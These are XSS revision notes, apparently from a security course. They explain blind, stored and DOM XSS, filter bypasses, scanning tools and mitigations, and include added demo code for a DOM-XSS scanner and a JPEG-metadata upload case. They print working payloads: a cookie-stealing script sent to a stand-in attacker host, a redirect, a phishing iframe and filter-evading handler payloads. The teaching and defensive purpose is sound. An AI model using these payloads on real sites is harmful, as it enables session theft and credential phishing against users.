XSS Revision - 2

The document discusses various types of Cross-Site Scripting (XSS) vulnerabilities, including Blind XSS, Stored XSS, and DOM XSS, along with methods for exploitation and mitigation techniques. It also introduces tools like XSSHunter and ParamSpider for detecting XSS vulnerabilities and provides examples of payloads for different XSS attacks. Additionally, it emphasizes the importance of input sanitization and the use of Web Application Firewalls (WAF) to prevent XSS attacks.

Uploaded by Aftab Shaikh
Blind XSS:

In some injection points, for example feedback forms, support tickets or chat bots, the
payload is rendered somewhere we cannot see (an admin panel, a log viewer, an internal
dashboard), so we never observe whether it fired. In such a case we use a payload that
calls back to a server we control when it executes; the callback tells us where, when
and in which context (URL, origin, referrer, non-HttpOnly cookies, DOM snapshot) it fired.

XSSHunter makes this easy: it generates the callback payloads and collects the reports
for you.

Link: https://xsshunter.com/

Note: the hosted xsshunter.com service was shut down in 2023; the open-source XSS Hunter
Express can be self-hosted, and any callback server you control serves the same purpose.
Because blind payloads fire in places you cannot predict, use them only against targets
you are authorised to test.

Stored XSS:

If the web application saves our payload and later renders it back (to us or to other
users) without encoding, the XSS is called Stored (persistent) XSS. Typical fields are
under the "My Profile" section (display name, bio, address), as well as comments, reviews
and support tickets. Every page that displays the stored value is a potential trigger,
not only the form where it was submitted.

DOM XSS

DOM XSS arises entirely in client-side JavaScript: attacker-controlled input is read
from a source (location.hash, location.search, document.referrer, window.name,
postMessage data) and written, unencoded, into a sink that parses HTML or evaluates
code (innerHTML, document.write, eval, setTimeout with a string argument, jQuery .html()).
Because the server may never see the payload (a fragment after # is not sent to it),
server-side filters and WAFs do not help; the fix is in the JavaScript (use textContent,
avoid string-to-code sinks).

Figure (source/sink diagram): https://files.cdn.thinkific.com/file_uploads/359809/images/2f6/041/306/1618132420695.jpg

DOM XSS Automated Scanner

findom-xss uses LinkFinder to collect the JavaScript of a target and then greps it for
known DOM XSS sources and sinks, so it is a quick first pass rather than a confirmation:
every hit still has to be traced by hand to check that the data really reaches the sink
unencoded.

Steps:

git clone https://github.com/dwisiswant0/findom-xss.git

git clone https://github.com/GerbenJavado/LinkFinder.git

cd LinkFinder

pip install -r requirements.txt

cd ..

cd findom-xss

nano findom-xss.sh

Change the LinkFinder path variable at the top of the script to where you cloned
LinkFinder (the path to linkfinder.py)

Save and Quit (make the script executable first if it is not)

./findom-xss.sh https://website.com
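The source-to-sink idea from the DOM XSS section and the grep-style scan that findom-xss performs, as an added example (this is not findom-xss code and not from the original notes). It flags a statement when a known DOM source, or a variable previously assigned from one, flows into a known sink, and it ignores writes to textContent and constant assignments to location. The sink and source lists and the sample JavaScript it scans are constructed for this demonstration.

```javascript
// Added example: a small source-to-sink scanner over JavaScript text.
// Flags lines where a DOM XSS source (attacker-controlled input) reaches a sink
// (something that parses HTML or turns a string into code), following simple
// taint through variables assigned from a source. Lists are constructed.

const SOURCES = [
  /\blocation\.(?:hash|search|href|pathname)\b/,
  /\bdocument\.(?:URL|documentURI|referrer|baseURI)\b/,
  /\bwindow\.name\b/,
  /\b(?:event|e|msg)\.data\b/,                       // postMessage handlers
  /\b(?:localStorage|sessionStorage)\.getItem\(/,
];

const SINKS = [
  [/\.(?:innerHTML|outerHTML)\s*=(?!=)/, "innerHTML/outerHTML assignment"],
  [/\.insertAdjacentHTML\s*\(/, "insertAdjacentHTML"],
  [/\bdocument\.write(?:ln)?\s*\(/, "document.write"],
  [/\beval\s*\(/, "eval"],
  [/\b(?:setTimeout|setInterval|Function)\s*\(\s*["'`]/, "string-to-code"],
  [/\.html\s*\(/, "jQuery .html()"],
  [/\blocation(?:\.href)?\s*=[^=]/, "redirect via location"],
];

// Does this text contain a source or an already-tainted identifier?
function hasTaint(text, tainted) {
  if (SOURCES.some((re) => re.test(text))) return true;
  for (const name of tainted) {
    if (new RegExp("\\b" + name + "\\b").test(text)) return true;
  }
  return false;
}

function scanDomXss(source) {
  const findings = [];
  const tainted = new Set();
  source.split("\n").forEach((line, i) => {
    // 1. Sinks: only the text flowing INTO the sink is checked, so a constant
    //    assignment like location.href = 'https://...' is not a finding.
    for (const [re, label] of SINKS) {
      const m = re.exec(line);
      if (m && hasTaint(line.slice(m.index + m[0].length), tainted)) {
        findings.push({ line: i + 1, sink: label, code: line.trim() });
        break;
      }
    }
    // 2. Taint propagation: `ident = <expr containing a source or tainted ident>`.
    //    Identifiers preceded by '.' (object properties) are not tracked.
    const assign = /(?<![.\w$])([A-Za-z_]\w*)\s*=(?!=)\s*([^;]*)/g;
    let a;
    while ((a = assign.exec(line)) !== null) {
      if (hasTaint(a[2], tainted)) tainted.add(a[1]);
    }
  });
  return findings;
}

// Constructed sample of client-side code, mixing vulnerable and safe lines.
const SAMPLE_JS = [
  "const q = new URLSearchParams(location.search).get('q');",          // taints q
  "document.getElementById('out').innerHTML = 'Results for ' + q;",    // finding
  "document.getElementById('safe').textContent = location.hash;",      // safe sink
  "document.write(decodeURIComponent(location.hash.slice(1)));",       // finding
  'setTimeout("refresh(" + window.name + ")", 1000);',                  // finding
  "location.href = 'https://example.com/home';",                        // constant, safe
  "window.addEventListener('message', (e) => { box.innerHTML = e.data; });", // finding
].join("\n");

console.log(scanDomXss(SAMPLE_JS));
```

The scanner is deliberately line-local: data that crosses function boundaries, goes through an array or is sanitised by a library before the sink is beyond it, which is exactly why the tool's output is a worklist for manual review rather than a result.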

XSS Mouse Payloads:

Sometimes a filter blocks the common payloads (script tags, onerror/onload, keyboard
handlers such as onkeydown) but not the mouse event handlers, because the developer
blocklisted only the handlers they knew about. In that case we can trigger XSS with
mouse events instead: onmouseover, onmouseenter, onmousedown, onclick, oncontextmenu and
so on, usually on an element styled to fill the viewport so the victim cannot avoid
triggering it. A list can be found under resources.

XSS Polyglots:

A polyglot is someone who speaks many languages. Applied to XSS, a polyglot is a single
payload built from several payload fragments so that it executes in several injection
contexts at once (HTML body, inside an attribute, inside a JavaScript string, inside a
comment or style block), whichever one the input lands in. That makes it a good first
probe when the reflection context is unknown, and its mixture of quotes, comment
delimiters and closing tags also defeats many naive input checks.

A list of polyglot payloads can be found at:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Intruders/XSS_Polyglots.txt
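An added example (not from the original notes or the linked list) showing why the two sections above work: a keyword blocklist of the kind that blocks "keyboard" payloads lets mouse-handler, entity-encoded and polyglot payloads through, and even a tighter regex filter cannot catch a payload that needs no tag or handler at all because it lands inside a JavaScript string. The filters, the payload list and the polyglot are constructed for this demonstration.

```javascript
// Added example: naive filters versus mouse-event, polyglot and context-specific payloads.
// Both filters return true when they REJECT the input.

// A blocklist written by someone who has only seen the "famous" payloads.
const BLOCKED = ["<script", "javascript:", "onerror=", "onload=", "onclick=",
                 "onkeydown=", "onkeyup=", "onkeypress="];

function blocklistFilter(input) {
  const lower = input.toLowerCase();
  return BLOCKED.some((bad) => lower.includes(bad));
}

// A stricter attempt: any on*= handler, dangerous tags, and entity/scheme tricks.
const HANDLER_RE = /\bon[a-z]+\s*=/i;
const TAG_RE = /<\/?\s*(?:script|svg|iframe|object|embed|style|math)\b/i;
const SCHEME_RE = /javascript:|&#/i;

function regexFilter(input) {
  return HANDLER_RE.test(input) || TAG_RE.test(input) || SCHEME_RE.test(input);
}

// Constructed payloads. "context" says where each one needs to be reflected to fire.
const PAYLOADS = [
  { name: "classic script tag",    context: "HTML body",
    payload: "<script>alert(1)</script>" },
  { name: "img onerror",           context: "HTML body",
    payload: "<img src=x onerror=alert(1)>" },
  { name: "keyboard handler",      context: "HTML body",
    payload: "<input autofocus onkeydown=alert(1)>" },
  { name: "mouse handler",         context: "HTML body",
    payload: "<div onmouseover=alert(1)>hover me</div>" },
  { name: "mouse handler, styled", context: "HTML body (fills the viewport)",
    payload: "<div onmouseenter=alert(1) style=position:fixed;top:0;left:0;width:100%;height:100%>" },
  { name: "entity-encoded scheme", context: "href attribute (browser decodes &#99; to c)",
    payload: '<a href="javas&#99;ript:alert(1)">click</a>' },
  { name: "constructed polyglot",  context: "attribute, <style>, <script> or body",
    payload: "'\"--></style></script><svg onmouseover=alert(1)>//" },
  { name: "js-string context",     context: "inside <script>var s='...';</script>",
    payload: "';alert(1)//" },
];

// Names of the payloads a given filter lets through.
function survivingPayloads(filter) {
  return PAYLOADS.filter((p) => !filter(p.payload)).map((p) => p.name);
}

console.log("blocklist lets through:", survivingPayloads(blocklistFilter));
console.log("regex filter lets through:", survivingPayloads(regexFilter));
```

The regex filter looks good until the last row: a payload reflected inside a JavaScript string literal needs neither a tag nor an event handler, so no tag-based blocklist can stop it. The defence that does is encoding the value for the context it is written into at output time, not inspecting it on input.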

XSS to URL Redirection:

Using an injection point and a payload that assigns to the page's location, we can send
the victim to an attacker-controlled website (for phishing, malware delivery, or simply
to demonstrate impact beyond an alert box).

The payload will look something like this:

<script>document.location.href="https://evilsite.com"</script>

(window.location="https://evilsite.com" does the same; document.href is not a property
and silently does nothing.)

XSS to Phishing:

Using an injection point and a specially crafted iframe payload, we can cover the
legitimate page with a login screen served from our site. Because the address bar still
shows the trusted domain, the user is far more likely to enter credentials than on a
lookalike domain, and whatever they type is posted to the attacker.

Payload: <iframe src="https://evilsite.com" height="100%" width="100%"></iframe>

XSS to Cookie Stealing:

This technique raises the severity of an XSS from "pops an alert" to session hijacking.
A simple payload sends the user's cookies to the attacker's web server. The payload can
be as follows:

<script>document.location.href="https://attackers.website/?cookie="+document.cookie</script>

Where document.cookie returns the cookies the script can read and document.location.href
sends them to the attacker's web server as part of the requested URL.

Two caveats. Cookies marked HttpOnly are never exposed to document.cookie, so against an
application with an HttpOnly session cookie this payload captures nothing and the impact
has to be shown another way (performing actions as the victim, reading pages the victim
can see). And redirecting the whole page is obvious to the victim, so in practice the
cookie is sent by a background request (an image or fetch beacon) with the value
URL-encoded so characters such as ";", "=" and "#" survive the trip.

XSS via File Upload:

Some web applications do not check the content of uploaded files, only the extension or
the declared content type. An attacker can then put the payload inside the file (an HTML
or SVG file containing a script, for example) and upload it; if the application serves
the file inline from its own origin, opening it runs the script on that origin, which is
XSS.

Where the application only accepts image files (and checks the image header), the payload
can go into the image's metadata instead: using exiftool, write the payload as the value
of a metadata tag such as Comment, then upload the image. The file is still a valid
image, so the check passes, and when the application later displays the metadata (image
details, gallery captions, an EXIF viewer) without encoding it, the alert box appears.
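An added example (not from the original notes) of the metadata case above, written so it runs without exiftool: it builds a minimal JPEG whose COM (comment) segment carries markup, shows that a magic-byte check still accepts it, extracts the comment the way an "image details" page would, and contrasts rendering it raw with rendering it encoded. The byte layout follows the JPEG COM segment (marker 0xFFFE) that exiftool's Comment tag writes; the file bytes and the two render functions are constructed for this demonstration.

```javascript
// Added example: a JPEG that passes an "is it an image?" check but carries XSS in metadata.

const PAYLOAD = "<script>alert(document.domain)</script>";

// Build a minimal JPEG: SOI, one COM segment, EOI. No picture data; enough for code
// that checks the header and walks segments, which is what upload filters do.
function buildJpegWithComment(comment) {
  const body = Buffer.from(comment, "latin1");
  const len = body.length + 2;                         // the length field counts itself
  const com = Buffer.from([0xff, 0xfe, (len >> 8) & 0xff, len & 0xff]);
  return Buffer.concat([Buffer.from([0xff, 0xd8]), com, body, Buffer.from([0xff, 0xd9])]);
}

// A typical upload-time check: JPEG magic bytes at the start and EOI at the end.
function looksLikeJpeg(buf) {
  return buf.length >= 4 &&
    buf[0] === 0xff && buf[1] === 0xd8 &&
    buf[buf.length - 2] === 0xff && buf[buf.length - 1] === 0xd9;
}

// Walk the JPEG segments and return every COM comment, as an image-info page would.
function readJpegComments(buf) {
  const comments = [];
  let i = 2;                                           // skip SOI
  while (i + 4 <= buf.length) {
    if (buf[i] !== 0xff) break;                        // not at a marker: corrupt, stop
    const marker = buf[i + 1];
    if (marker === 0xd9) break;                        // EOI
    if (marker === 0xd8 || (marker >= 0xd0 && marker <= 0xd7)) { i += 2; continue; } // standalone markers
    const len = buf.readUInt16BE(i + 2);
    if (marker === 0xfe) comments.push(buf.slice(i + 4, i + 2 + len).toString("latin1"));
    i += 2 + len;
    if (marker === 0xda) break;                        // SOS: entropy-coded data follows
  }
  return comments;
}

// Vulnerable rendering: metadata is trusted because "it came from an image".
function renderInfoVulnerable(buf) {
  return `<p>Comment: ${readJpegComments(buf).join(" ")}</p>`;
}

// Fixed rendering: metadata is untrusted input like any other and is HTML-encoded.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderInfoSafe(buf) {
  return `<p>Comment: ${escapeHtml(readJpegComments(buf).join(" "))}</p>`;
}

const UPLOAD = buildJpegWithComment(PAYLOAD);         // what the attacker submits
console.log("accepted as JPEG:", looksLikeJpeg(UPLOAD));
console.log("vulnerable:", renderInfoVulnerable(UPLOAD));
console.log("safe:      ", renderInfoSafe(UPLOAD));
```

Stripping metadata on upload (re-encoding the image) removes this particular channel, but the durable fix is the one in renderInfoSafe: whatever the file format, anything read out of it and written into a page is output-encoded for that context.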

XSS Mitigations:

Validate input on arrival (allow-lists for the expected format; reject what does not fit)

Encode data on output, per context (HTML body, attribute, JavaScript string, URL), since
the same character is dangerous in one context and harmless in another; encoding "all
input characters" on the way in is the wrong layer and breaks legitimate data

Avoid dangerous DOM sinks (use textContent instead of innerHTML; never build code from
strings)

Use appropriate response headers (Content-Type with charset, X-Content-Type-Options:
nosniff, and HttpOnly plus Secure on session cookies to limit what a successful XSS can
take)

Content Security Policy (a nonce- or hash-based script-src with object-src 'none' blocks
injected inline scripts even where encoding was missed)

Usage of a WAF as defence in depth only: it matches known payload patterns and is
bypassed by polyglots and encoding tricks, so it must not be the primary control

ParamSpider:

A tool that mines URL parameters for a domain from web archives (the Wayback Machine),
which yields a list of candidate injection points for reflected XSS without crawling the
live site. The tool can be installed from https://github.com/devanshbatham/ParamSpider

Steps:

$ git clone https://github.com/devanshbatham/ParamSpider

$ cd ParamSpider

$ pip3 install -r requirements.txt

$ python3 paramspider.py --domain hackerone.com

(Newer releases install a paramspider command and take the domain with -d instead; check
the README of the version you cloned.)

$3133.7 Google Bug Bounty Writeup - XSS Vulnerability:

https://www.pethuraj.com/blog/google-bug-bounty-writeup/

Best wishes,

Rohit Gautam & Shifa Cyclewala
